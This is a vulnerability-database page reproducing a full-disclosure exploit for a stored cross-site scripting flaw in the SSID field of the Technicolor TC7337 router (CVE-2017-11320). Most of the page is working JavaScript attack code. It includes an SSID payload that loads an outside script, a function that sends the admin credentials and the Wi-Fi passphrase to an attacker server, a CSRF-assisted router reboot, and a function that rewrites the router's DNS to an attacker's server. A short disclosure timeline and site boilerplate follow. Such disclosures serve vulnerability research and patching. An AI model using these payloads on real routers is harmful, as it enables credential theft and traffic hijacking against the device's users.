Vulners
Lucene search
Technicolor TC7337 - SSID Persistent Cross-Site Scripting Vulnerability
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | Technicolor TC7337 Stored Cross-Site Scripting Vulnerability | 3 Aug 201700:00 | – | cnvd |
 | CVE-2017-11320 | 3 Aug 201708:00 | – | cve |
 | CVE-2017-11320 | 3 Aug 201708:00 | – | cvelist |
 | EUVD-2017-2954 | 7 Oct 202500:30 | – | euvd |
 | CVE-2017-11320 | 3 Aug 201708:29 | – | nvd |
 | CVE-2017-11320 | 3 Aug 201708:29 | – | osv |
 | Technicolor TC7337 Cross Site Scripting | 3 Aug 201700:00 | – | packetstorm |
 | Cross site scripting | 3 Aug 201708:29 | – | prion |
// Device : Technicolor TC7337
// Vulnerable URL : https://your.rou.ter.ip/wlscanresults.html
// XSS through SSID : '><script src=//url.co></script> ( Exactly 32 bytes u_u )
// ^
// 5char domains are running | 'src' does not requires quotes , and passing the URL with ony '//'
// out, grab yours ! +---> it will cause the browser to make the request with the current protocol,
// which is HTTP , duh
// Below is the content of url.co/index.html
// index.html ( which is just a JavaScript actually, but we have to use the index to fit the 32 chars ) :
function get_passwords(attackers_server) {
// attackers_server = server to send the credentials
// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
// XSS to get Admin's login/passwd + Wifi passphrase
// from backup settings
xmlhttp=new XMLHttpRequest();
xmlhttp.open("GET", "/backupsettings.cmd", false); // GET the Backup XML
xmlhttp.send();
var k = xmlhttp.responseText.indexOf("Admin") ; // Search for Admin's Login and Password
var y = xmlhttp.responseText.indexOf("KeyPassphrase") ; // Search for Wifi PassPhrase
// Add a img requesting the attacker website with the leaked passwords in the GET parameters
document.write('<img src="'+attackers_server+'?net='+ encodeURIComponent(xmlhttp.responseText.slice(k,k+100)+xmlhttp.responseText.slice(y,y+80))+'">');
}
function reboot_router() {
// XSS + CSRF reboot router
// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
// Why? Because It's fun to watch a XSS doing 'physical' stuff
xmlhttp=new XMLHttpRequest();
xmlhttp.open("GET", "/resetrouter.html", false); // GET the page of the reset interface
xmlhttp.send();
var w = xmlhttp.responseText.indexOf("Key") ; // Search for the SessionKey, some sort of CSRF Token
var sessionKey = xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1] ; // Regex because the key is inside quotes
xmlhttp=new XMLHttpRequest();
xmlhttp.open("GET", "/rebootinfo.cgi?sessionKey="+sessionKey, false);
// Request the reboot page with the CSRF token
xmlhttp.send();
}
function dns_poisoning(attackers_dns) {
// attackers_dns = malicious DNS Server
// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ holy shit my code is ugly as fuck , sorry world
// Alter the DNS Config of the Router
// changing the Primary and Secondary DNS to the attacker's one
xmlhttp=new XMLHttpRequest();
xmlhttp.open("GET", "/rede-dnsv4.html", false); // GET the DNS Config page
xmlhttp.send();
var w = xmlhttp.responseText.indexOf("Key") ; // Search for the SessionKey, some sort of CSRF Token
var sessionKey = xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1]; // Regex because the key is inside quotes
var i_wanip = xmlhttp.responseText.indexOf("wanip");
var wanip = xmlhttp.responseText.slice(i_wanip,i_wanip+30).match(/'([^']+)'/)[1];
var i_wansubnet = xmlhttp.responseText.indexOf("wansubnet");
var wansubnet = xmlhttp.responseText.slice(i_wansubnet,i_wansubnet+30).match(/'([^']+)'/)[1];
var i_wangatewayip = xmlhttp.responseText.indexOf("wangatewayip");
var wangatewayip = xmlhttp.responseText.slice(i_wangatewayip,i_wangatewayip+30).match(/'([^']+)'/)[1];
xmlhttp=new XMLHttpRequest();
xmlhttp.open("GET", "/rede-dnsv4.cgi?enblDhcpClnt=0&wanIpAddress="+wanip+"&wanIfName=wanbridge&wanSubnetMask="+wansubnet+"&wanIntfGateway="+wangatewayip+"&dnsPrimary="+attackers_dns+"&dnsSecondary="+attackers_dns+"&sessionKey="+sessionKey, false);
xmlhttp.send(); // Send the request to SAVE the Primary and Secondary DNS with the CSRF Token
//After saving we need to apply the settings. yeah, fuck logic --'
//Getting a brand NEW SessionKey
xmlhttp=new XMLHttpRequest();
xmlhttp.open("GET", "/rede-dnsv4.html", false); // GET the DNS Config page
xmlhttp.send();
var w = xmlhttp.responseText.indexOf("Key") ; // Search for the SessionKey, some sort of CSRF Token
var sessionKey = xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1] ; // Regex because the key is inside quotes
xmlhttp=new XMLHttpRequest();
xmlhttp.open("GET", "/wandnscfg.cmd?sessionKey="+sessionKey, false);
// GET the apply DNS page
xmlhttp.send();
}
//Choose your path !
//get_passwords("https://evil.domain/") ;
//reboot_router();
dns_poisoning("1.3.3.7")
// TimeLine
// ---------
// 08/07/2017 - First email sent to the vendor (no answer)
// 16/07/2017 - Second email sent to the vendor (no answer)
// 18/07/2017 - Third email sent to the vendor (no answer)
// 02/08/2017 - Full Disclosure
# 0day.today [2018-01-10] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Aug 2017 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.00401